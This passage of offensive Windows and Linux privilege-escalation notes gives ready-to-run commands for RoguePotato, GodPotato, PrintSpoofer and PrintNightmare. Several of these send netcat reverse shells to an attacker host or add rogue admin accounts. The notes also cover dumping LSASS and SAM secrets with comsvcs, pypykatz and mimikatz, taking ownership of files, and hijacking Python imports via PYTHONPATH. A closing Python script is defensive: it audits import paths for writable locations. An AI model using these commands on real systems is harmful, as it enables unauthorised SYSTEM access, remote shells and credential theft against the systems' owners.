RoguePotato (usage): -r is the redirector (usually your attacker host); -e is the full command line; -l runs RogueOxidResolver locally on that port (all-in-one). Optional: -c {clsid}, -p / -z pipe name.

# Listener on attacker
nc -lnvp <PORT>

# All-in-one: RogueOxidResolver on victim, forward/OXID redirector at attacker
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -l 9999

# Without local RogueOxidResolver: run RogueOxidResolver.exe on the remote/redirector machine (see repo), then e.g.:
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"

GodPotato (example): only -cmd is required; the tool supplies CLSID behavior internally.

nc -lnvp <PORT>

c:\tools\GodPotato.exe -cmd "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"

# As in upstream README (nc connects out; adjust paths/nc flags to your binary)
c:\tools\GodPotato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ATTACKER_IP> <PORT>"

PrintSpoofer (usage): -c runs the command as SYSTEM; -i attaches an interactive SYSTEM process to the current console (bind/reverse/psexec-style shells).

nc -lnvp <PORT>

# Non-interactive: spawn and exit (WinRM/webshell-style) — matches upstream example
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd"

# Interactive: SYSTEM cmd in the same console (reverse/bind shell, psexec, etc.)
c:\tools\PrintSpoofer.exe -i -c cmd

PrintNightmare (usage): PowerShell via the Print Spooler (Invoke-Nightmare). By default, it creates local admin adm1n with password P@ssw0rd; use parameters to set custom credentials or load a custom DLL payload.

# Load the module
Import-Module .\CVE-2021-1675.ps1

# Custom local admin credentials
Invoke-Nightmare -DriverName "BackupService" -NewUser "svc_backup" -NewPassword "P@ssw0rd123!"

# Custom DLL payload path
Invoke-Nightmare -DLL "C:\bindshell.dll"

via SeDebug

LSASS

# Remotely dump LSA secrets
# NOTE: also requires SeDebugPrivilege
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --lsa
# Remotely dump SAM secrets
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --sam

NOTE: These require SeDebugPrivilege

Get LSASS memory dump via GUI:

  1. Open Task Manager
  2. Select Details > lsass.exe
  3. Right-Click > “Create Dump File”
  4. Move or transfer the file (usually in %TMP%)

# Get LSASS PID
tasklist /fi "IMAGENAME eq lsass.exe"
Get-Process lsass

# Dump
powershell -command "rundll32.exe C:\windows\system32\comsvcs.dll,MiniDump <PID> $env:TMP\crash.dmp full"

# Parse creds/hashes from dump
pypykatz lsa minidump <DUMP_FILE>
# OR
.\mimikatz.exe
log
sekurlsa::minidump crash.dmp
sekurlsa::logonpasswords

via SeTakeOwnership

NOTE: this is considered dangerous and destructive: not only can it be hard to revert, it can also have unintended consequences and break services that use the file

# Get file info
Get-ChildItem -Path '<FILE>' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Or if that fails, check the folder ownership
cmd /c dir /q '<FOLDER>'

# Change ownership
takeown /f '<FILE>'

# OPTIONAL: grant yourself ACL permissions (F = full control; a narrower right such as R may be all that is needed)
icacls '<FILE>' /grant <USER>:F

Python

The following logic can be placed inside a particular module’s function (ideally at the beginning of the function) to achieve a priv esc:

    import os
    os.system("id")
    os.system('ls -la /root/')

Wrong write permissions

# Check Python scripts itself
ls -la <PYTHON_FILE>
# Later check its imports

# See if imports are hookable
python3 -V
grep -r "def <FUNCTION>" /usr/local/lib/python3.8/dist-packages/<MODULE>/*

ls -l /usr/local/lib/python3.8/dist-packages/<MODULE>/__init__.py

Library Path

# Check Python library importation order
python3 -c 'import sys; print("\n".join(sys.path))'

# Check for module location
pip3 show <MODULE>

PYTHONPATH environment variable

# Sometimes the script or executable needs to be executed in a very specific manner
sudo -l

# Execute over-written function
sudo PYTHONPATH=/tmp/ /usr/bin/python3 <PYTHON_FILE>
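
An added Python check (not part of the original notes) that walks an interpreter's import path for a given module, in resolution order, and reports the writable directories and module files that make the hijack above possible; trusted_uids (root by default) and the module name are the assumed inputs, and ownership plus mode bits are the only evidence consulted (no ACLs).

```python
import os
import stat
import sys

# Added example, not part of the original notes: for one module name, walk an
# import path in order and report every location someone other than a trusted
# uid could write. A writable directory searched BEFORE the real module lets a
# same-named module be planted ahead of it (the PYTHONPATH case above); a
# writable module file or its directory lets the real module be edited.


def writable_by_others(st: os.stat_result, trusted_uids) -> list[str]:
    """Reasons derived from mode bits and ownership (ACLs are not consulted)."""
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"writable by gid {st.st_gid}")
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by untrusted uid {st.st_uid}")
    return reasons


def audit_import_path(paths, module: str, trusted_uids=frozenset({0})):
    """Return (resolved_file_or_None, [(location, reason), ...]) for `module`."""
    findings, resolved = [], None
    for entry in paths:
        if entry == "":
            findings.append(("", "empty entry: the current working directory is searched"))
            continue
        try:
            dst = os.stat(entry)
        except OSError:
            continue
        if not stat.S_ISDIR(dst.st_mode):
            continue  # zip/egg entries are not covered here
        dir_reasons = writable_by_others(dst, trusted_uids)
        found = None
        if resolved is None:
            for cand in (os.path.join(entry, module + ".py"),
                         os.path.join(entry, module, "__init__.py")):
                if os.path.isfile(cand):
                    found = resolved = cand
                    break
        if found:
            tag = "module directory"
        elif resolved is None:
            tag = "shadowable directory"   # searched before the real module
        else:
            tag = "later directory"        # irrelevant for this module, still writable
        for why in dir_reasons:
            findings.append((entry, f"{tag} {why}"))
        if found:
            for why in writable_by_others(os.stat(found), trusted_uids):
                findings.append((found, f"module file {why}"))
    return resolved, findings


if __name__ == "__main__":
    name = sys.argv[1] if len(sys.argv) > 1 else "os"
    where, issues = audit_import_path(sys.path, name)
    print(f"{name} resolves to {where}")
    for loc, why in issues:
        print(f"  {loc or '<cwd>'}: {why}")
```

Run it with the same interpreter and PYTHONPATH the privileged script uses (e.g. `sudo PYTHONPATH=/tmp/ /usr/bin/python3 audit.py <MODULE>`, file name being whatever you saved it as), since sys.path differs per interpreter.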